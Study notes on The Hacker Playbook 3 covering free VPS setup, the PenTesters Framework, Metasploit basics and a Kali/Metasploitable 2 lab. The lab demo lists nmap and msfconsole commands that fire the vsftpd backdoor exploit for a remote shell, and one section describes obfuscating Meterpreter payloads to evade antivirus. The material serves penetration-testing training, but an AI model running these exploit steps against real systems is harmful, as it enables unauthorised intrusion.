THE HACKER PLAYBOOK 3: Practical Guide to Penetration Testing, Red Team Edition
Peter Kim
1 Pregame - The Setup
Setting Up Your Campaign
Setting Up Your External Servers
- Lightsail is free only for 3 months.
- For permanently free VPS, Oracle Cloud offers the best resources.
- Other good options include GCP, AWS EC2 free tier, and Azure.
Step-by-Step: Set Up Free Ubuntu VPS on Oracle Cloud
Step 1: Create an Oracle Cloud Account
- Go to: https://www.oracle.com/cloud/free/
- Click "Start for Free"
- Fill in your:
- Name, email, password
- Country/region
- Credit card (required for identity verification, but you won’t be charged)
- Confirm your email and phone number
Step-by-Step: Set Up Free Ubuntu VPS on Microsoft Azure
Step 1: Create an Azure Cloud Account
- Go to: https://azure.microsoft.com/free
- Click "Start free". Use the "Free services" page in the Azure portal to create free services.
- Sign in with a Microsoft account or create one
- Enter:
- Personal details
- Credit card (for verification only)
- Phone number
If you create resources anywhere other than the "Free services" page, the free tier or free resource configuration option is not always selected by default.
To avoid incurring charges, make sure you create resources from the "Free services" page.
Then, when you create the resource, be sure to select the free tier.
Step 2: Create Ubuntu VM (Free Tier)
You can create an Azure virtual machine (VM) through the Azure portal, a browser-based user interface for creating Azure resources. To see the VM in action, you will also connect to it over SSH and install the NGINX web server.
- After sign-in, go to Azure Portal: https://portal.azure.com
- On the sidebar, click "Virtual Machines" → Create → Azure virtual machine
- Configure the project details:
- Subscription: Select your free tier subscription
- Resource group: Create a new one (e.g., my-free-tier)
- VM name: e.g., ubuntu-vps
- Region: Choose one that allows B1S VM (e.g., East US)
- Image: Choose Ubuntu Server 22.04 LTS
- Size: Click "See all sizes", filter by “Free services”, and pick B1S
- Authentication type:
- Choose SSH public key
- Username: azureuser
- Leave disk, networking, and monitoring as defaults (or adjust as needed)
- Click Review + Create, then Create
- Download myKey.pem
Step 3: Connect to the VM
After deployment completes, select "Go to resource". Once the VM is deployed:
- Go to the VM overview page: select the VM "ubuntu-vps" you created from the resource list.
- On the VM's page, select the public IP address and copy it to the clipboard.
- Connect using:
ssh -i ~/Downloads/myKey.pem azureuser@your_public_ip
The default user is usually azureuser, but double-check in the "Essentials" section. OpenSSH refuses a private key file that other users can read, so restrict myKey.pem to your own user (mode 600) before connecting.
Optional: Open Ports (Firewall)
- Go to the VM's Networking tab
- Add inbound port rules for:
- HTTP (port 80)
- HTTPS (port 443)
- Custom ports if needed (e.g., 8080, 22)
Install Web server
From the SSH session, update the package sources and then install the latest NGINX package:
sudo apt-get -y update
sudo apt-get -y install nginx
Test by using a web browser to access the public IP of the VM.
PENTESTERS FRAMEWORK (PTF)
PTF is a Python script to keep your penetration testing toolkit up-to-date.
PTF installs all of your penetration testing tools (latest and greatest), compiles them, builds them, and makes it so that you can install/update your distribution on any machine. Everything is organized in a fashion that follows the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used.
PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit.
To download the PenTesters Framework (PTF):
git clone https://github.com/trustedsec/ptf/
The config/ptf.config file contains the base location where everything will be installed. By default this is the /pentest directory.
Installation
sudo apt install python3-pip
pip install -r requirements.txt
sudo ./ptf
This puts you in a Metasploit-style shell with a similar look and feel.
- Update EVERYTHING! This installs all of the tools inside of PTF:
ptf> use modules/install_update_all
You can also individually install each module, then use modules/update_installed, which only updates what you've previously installed:
ptf> use modules/update_installed
Install only the exploitation tools:
ptf> use modules/exploitation/install_update_all
Modify the list.txt file and add only the tools you want to install or update, for example:
modules/exploitation/metasploit
modules/vulnerability-analysis/nmap
modules/post-exploitation/unicorn
Then run the custom list:
ptf> use modules/custom_list/list
[*] You are about to install/update everything. Proceed? [yes/no]:
..
[*] All finished installing/and or updating.. All shiny again.
ptf>
You can also use a single module directly:
ptf> use modules/intelligence-gathering/theHarvester
ptf:(modules/intelligence-gathering/theHarvester)> show options
Module Author: Mauro Risonho de Paula Assumpcao (firebits)
Module Description: This module will install/update theHarvester - E-mails, subdomains and names Harvester - OSINT
-------------------------------------------------------------------------------------
INSTALL_TYPE: GIT
REPOSITORY_LOCATION: https://github.com/laramies/theHarvester.git
INSTALL_LOCATION: /pentest/intelligence-gathering/theharvester/
-------------------------------------------------------------------------------------
ptf:(modules/intelligence-gathering/theHarvester)> install
..
[*] Created automatic launcher, you can run the tool from anywhere by typing: theHarvester
ptf:(modules/intelligence-gathering/theHarvester)> back
ptf>
Modules
List the modules you can install:
ptf> show modules
Under the modules/ directory, there are subdirectories based on the Penetration Testing Execution Standard (PTES) phases:
ptf/modules$ tree -L 1
.
|-- __init__.py
|-- av-bypass
|-- code-audit
|-- custom_list
|-- exploitation
|-- install_update_all.py
|-- intelligence-gathering
|-- mobile-analysis
|-- osx
|-- password-recovery
|-- pivoting
|-- post-exploitation
|-- powershell
|-- pre-engagement
|-- reporting
|-- reversing
|-- threat-modeling
|-- update_installed.py
|-- vulnerability-analysis
|-- webshells
|-- windows-tools
`-- wireless
The PTES is a framework that defines a structured approach to penetration testing.
It outlines best practices, methodologies, and a common language for conducting thorough and repeatable security assessments. PTES consists of 7 phases:
- Pre-engagement Interactions: define scope and rules
- Intelligence Gathering: collect information
- Threat Modeling: identify potential attack paths
- Vulnerability Analysis: find and assess weaknesses
- Exploitation: attempt attacks to verify vulnerabilities
- Post-Exploitation: analyze impact and maintain access
- Reporting: share findings and suggest fixes
As soon as you add a new one, for example testing.py, it will automatically be imported next time you launch PTF.
There are a few key components when looking at a module that must be completed.
Below is a sample module:
AUTHOR="David Kennedy (ReL1K)"
DESCRIPTION="This module will install/update the Browser Exploitation Framework (BeEF)"
INSTALL_TYPE="GIT"
REPOSITORY_LOCATION="https://github.com/beefproject/beef"
X64_LOCATION="https://github.com/something_thats_x64_instead_of_x86"
INSTALL_LOCATION="beef"
DEBIAN="ruby1.9.3,sqlite3,ruby-sqlite3"
ARCHLINUX="arch-module,etc"
BYPASS_UPDATE="NO"
AFTER_COMMANDS="cd {INSTALL_LOCATION},ruby install-beef"
LAUNCHER="beef"
TOOL_DEPEND="modules/exploitation/metasploit"
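The module file above is just a list of KEY="value" lines, which makes it easy to check before PTF tries to run it (the page's own sample, for instance, originally had an unterminated X64_LOCATION string). The following is an added example written for these notes, not PTF's own loader: it parses a module definition in that format, expands the {INSTALL_LOCATION} placeholder in AFTER_COMMANDS against the /pentest base and a PTES category, and reports obvious defects. The sample text is constructed from the BeEF module above; the required-key list, the accepted INSTALL_TYPE values and the HTTPS-only rule for repositories are assumptions made for this check, not PTF's real validation rules.

```python
"""Parse and sanity-check a PTF-style module definition.

Added example, not PTF's own loader. The format is the KEY="value" layout of
the sample module shown in the notes; the sample text is constructed from it.
The required-key list and the accepted INSTALL_TYPE values are assumptions
made for this check, not PTF's real validation rules.
"""
import re

# Constructed sample: the BeEF module from the notes, without the x64 line.
SAMPLE_MODULE = '''\
AUTHOR="David Kennedy (ReL1K)"
DESCRIPTION="This module will install/update the Browser Exploitation Framework (BeEF)"
INSTALL_TYPE="GIT"
REPOSITORY_LOCATION="https://github.com/beefproject/beef"
INSTALL_LOCATION="beef"
DEBIAN="ruby1.9.3,sqlite3,ruby-sqlite3"
ARCHLINUX = "arch-module,etc"
BYPASS_UPDATE="NO"
AFTER_COMMANDS="cd {INSTALL_LOCATION},ruby install-beef"
LAUNCHER="beef"
TOOL_DEPEND="modules/exploitation/metasploit"
'''

BASE_INSTALL = "/pentest"  # default base location from config/ptf.config
REQUIRED_KEYS = ("AUTHOR", "DESCRIPTION", "INSTALL_TYPE", "INSTALL_LOCATION")  # assumption
SUPPORTED_INSTALL_TYPES = ("GIT", "SVN", "FILE")  # assumption

# One assignment per line: KEY = "value", with optional spaces around '='.
LINE_RE = re.compile(r'^\s*([A-Z0-9_]+)\s*=\s*"(.*)"\s*$')


def parse_module(text):
    """Return the module's fields as a dict; reject any line that is not a
    properly quoted assignment (an unterminated string, for instance)."""
    fields = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = LINE_RE.match(line)
        if match is None:
            raise ValueError(f'line {lineno}: expected KEY="value", got {line!r}')
        fields[match.group(1)] = match.group(2)
    return fields


def split_list(fields, key):
    """PTF packs lists (DEBIAN, AFTER_COMMANDS, ...) as comma-separated strings."""
    return [item.strip() for item in fields.get(key, "").split(",") if item.strip()]


def install_path(fields, category):
    """Where the tool lands: <base>/<PTES category>/<INSTALL_LOCATION>."""
    return f"{BASE_INSTALL}/{category}/{fields['INSTALL_LOCATION']}"


def after_commands(fields, category):
    """Expand the {INSTALL_LOCATION} placeholder into the real install path."""
    path = install_path(fields, category)
    return [cmd.replace("{INSTALL_LOCATION}", path)
            for cmd in split_list(fields, "AFTER_COMMANDS")]


def validate(fields):
    """Return a list of problems (empty when the module looks usable)."""
    problems = [f"missing {key}" for key in REQUIRED_KEYS if key not in fields]
    install_type = fields.get("INSTALL_TYPE")
    if install_type not in SUPPORTED_INSTALL_TYPES:
        problems.append(f"unsupported INSTALL_TYPE {install_type!r}")
    if install_type in ("GIT", "SVN"):
        # Fetch tool sources over HTTPS only, so they cannot be swapped in transit.
        if not fields.get("REPOSITORY_LOCATION", "").startswith("https://"):
            problems.append("REPOSITORY_LOCATION must be an https:// URL")
    return problems


if __name__ == "__main__":
    module = parse_module(SAMPLE_MODULE)
    print("problems:", validate(module) or "none")
    print("apt packages:", split_list(module, "DEBIAN"))
    print("post-install commands:", after_commands(module, "exploitation"))
```

Running the script on the constructed sample reports no problems and expands the post-install step to `cd /pentest/exploitation/beef` followed by `ruby install-beef`; feeding it the original line with the missing closing quote raises a ValueError naming the offending line, which is the kind of typo that otherwise surfaces only when the shell command fails.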
Tools of the Trade
Type | Focus | Attitude |
---|---|---|
Red Team | Realistic attack simulation | Adversarial |
Blue Team | Defense, monitoring, response | Defensive |
Purple Team | Red + Blue collaboration | Cooperative |
Penetration Test | Known-scope vulnerability discovery | Adversarial but scoped tightly |
Term | Meaning | Example |
---|---|---|
Vulnerability | A flaw or weakness | MS17-010 SMB bug |
Exploit | Code that abuses a vulnerability | EternalBlue |
Payload | Malicious code delivered after exploitation | Meterpreter shell |
Exploitation | The act of using the exploit | Running EternalBlue to get access |
Patch | Fix for a vulnerability | Windows update that closes SMB flaw |
CVE | Public ID for a vulnerability | CVE-2017-0144 |
PoC | Demo of an exploit | GitHub code showing buffer overflow |
Metasploit Framework
Metasploit is a powerful open-source framework used by security professionals (and attackers) to develop, test, and execute exploits. It’s like a toolkit for hacking into systems ethically.
We might use a known Windows vulnerability (EternalBlue) to break into computers on the target network.
This exploit targets Windows file-sharing (SMBv1) and lets an attacker gain remote access to vulnerable systems without needing login credentials.
Obfuscating Meterpreter Payloads
Obfuscating Meterpreter payloads means hiding or disguising the malicious code (payload) generated by Metasploit so that it is harder for antivirus (AV) software to detect or block.
Metasploit Unleashed - Free Online Ethical Hacking Course
Teach you how to use Metasploit, in a structured and intuitive manner.
Introduction
Overview
The Metasploit Framework (MSF) is far more than just a collection of exploits.
Requirements
We highly recommend using a system that is capable of running multiple virtual machines to host your labs. Before jumping into the Metasploit Framework, we will need both an attacking machine (Kali Linux) and a victim machine (Metasploitable 2), as well as a hypervisor to run both in a safe and secluded network environment.
- Hypervisor: Our recommended hypervisor for the best out-of-the-box compatibility with Kali and Metasploitable is VMware Player.
- Kali Linux: Kali Linux comes with Metasploit pre-installed along with numerous other security tools that you can try out against your victim machine.
Extract the downloaded Kali VirtualBox image:
7z x kali-linux-2025.2-virtualbox-amd64.7z
Launch VirtualBox:
virtualbox
In "Tools", select "Add".
We then navigate to the location where our VM is downloaded and find the .vbox file.
We can verify the settings that will be set here, and if we need to change any we can. Once we are happy we can select boot the VM and use it as normal. Remember the default login is kali for the user and kali for the password!
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.
You can download the image file of Metasploitable 2 from SourceForge.
This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network.
Once you have downloaded the Metasploitable VM, extract the zip file:
- VirtualBox: In "Tools", select "New"
- VMware: Open up the .vmx file using your VMware product of choice
Now choose the option to use an existing virtual hard disk file. Click the folder icon, then browse and select the .vmdk file extracted from the Metasploitable 2 ZIP archive. This will mount the VM's hard drive directly, no ISO needed.
Create the instance.
After a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.
Check the running services:
netstat -tuln
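The netstat listing is the host-side counterpart of the inbound port rules configured on the Azure VM earlier: every socket bound to 0.0.0.0 or :: is reachable from other hosts as soon as the firewall lets the traffic through, while a socket bound to 127.0.0.1 is not. The following is an added example for these notes, not code from the book or from Metasploit: it parses `netstat -tuln` output, separates loopback-only listeners from remotely reachable ones, and lists the reachable ports that the firewall plan never meant to expose. The netstat output is constructed to resemble a lab box, not captured from Metasploitable, and the allow-list of intended ports (22, 80, 443) is an assumption for illustration.

```python
"""Inventory listening sockets from `netstat -tuln` output and flag the ones a
remote host could reach. Added example, not from the book or Metasploit; the
netstat output below is constructed, not captured from a real machine, and the
allow-list of intended ports is an assumption for illustration.
"""
import ipaddress

# Constructed sample output of `netstat -tuln`.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp6       0      0 :::8080                 :::*                    LISTEN
udp        0      0 0.0.0.0:69              0.0.0.0:*
udp        0      0 127.0.0.1:53            0.0.0.0:*
"""


def parse_netstat(text):
    """Return (proto, address, port) for every listener line, skipping headers."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].startswith(("tcp", "udp")):
            continue
        # "Local Address" is addr:port; IPv6 addresses contain ':' themselves,
        # so split on the last colon only.
        addr, port = fields[3].rsplit(":", 1)
        if port == "*":
            continue
        sockets.append((fields[0].rstrip("6"), addr, int(port)))
    return sockets


def is_reachable_remotely(addr):
    """A listener bound to a wildcard (0.0.0.0, ::) or to any non-loopback
    interface address is reachable from other hosts once the firewall allows it."""
    return not ipaddress.ip_address(addr).is_loopback


def exposed_listeners(text, allowed_ports):
    """Return (proto, port) for remotely reachable listeners whose port is not
    in the set of ports the firewall plan intends to open."""
    return [(proto, port) for proto, addr, port in parse_netstat(text)
            if is_reachable_remotely(addr) and port not in allowed_ports]


if __name__ == "__main__":
    for proto, port in exposed_listeners(SAMPLE_NETSTAT, {22, 80, 443}):
        print(f"{port}/{proto} listens on all interfaces but has no intended inbound rule")
```

On the constructed sample the script reports 21/tcp, 8080/tcp and 69/udp: each is bound to every interface yet absent from the intended inbound rules, so it should either be bound to loopback, disabled, or added to the rule set deliberately. MySQL on 3306 and the DNS stub on 53 are loopback-only and need no rule at all.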
Demo of penetration testing with Metasploitable 2
- Open both machines, Metasploitable 2 and Kali Linux, side by side.
- Check the IP addresses of both machines to get an overview; note the IP of the target (Metasploitable).
- Perform a network scan with Nmap to see which services are running on the target and which of them offer a way in:
- -sV: get the versions of the services running on the target machine
- -O: detect the operating system of the target machine
- Use the vsftpd_234_backdoor exploit to gain access to the machine:
- start the Metasploit Framework
- select the exploit we are going to use
- set the target we are deploying the exploit against
- run the exploit
$ nmap -sV -O 192.168.10.5
$ msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.104
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
You will see that a command shell on the target machine is obtained.
Metasploit Architecture
Metasploit is written in Ruby.
- Filesystem and Libraries: In Kali Linux, Metasploit is provided in the metasploit-framework package and is installed in the /usr/share/metasploit-framework directory:
- data: editable files used by Metasploit to store binaries required for certain exploits, wordlists, images, and more.
- documentation
- lib: the framework code base.
- modules: the actual MSF modules for exploits, auxiliary and post modules, payloads, encoders, and nop generators.
- plugins
- scripts
- tools: useful command-line utilities.
- Metasploit Libraries: There are a number of MSF libraries that allow us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads.
- Rex: the basic library for most tasks. Handles sockets, protocols, text transformations, and others (SSL, SMB, HTTP, XOR, Base64, Unicode).
- Msf::Core
- Msf::Base
- Modules and Locations
- Metasploit Object Model
- Mixins and Plugins
Metasploit Fundamentals
Information Gathering
Vulnerability Scanning
Writing a Simple Fuzzer
Exploit Development
Web App Exploit Dev
Client Side Attacks
MSF Post Exploitation
Meterpreter Scripting
Maintaining Access
MSF Extended Usage
Metasploit GUIs
Post Module Reference
Auxiliary Module Reference
TryHackMe – Beginner Friendly, Hands-On: Cyber Security Learning Roadmap
Conclusion
All of your tools and servers are configured.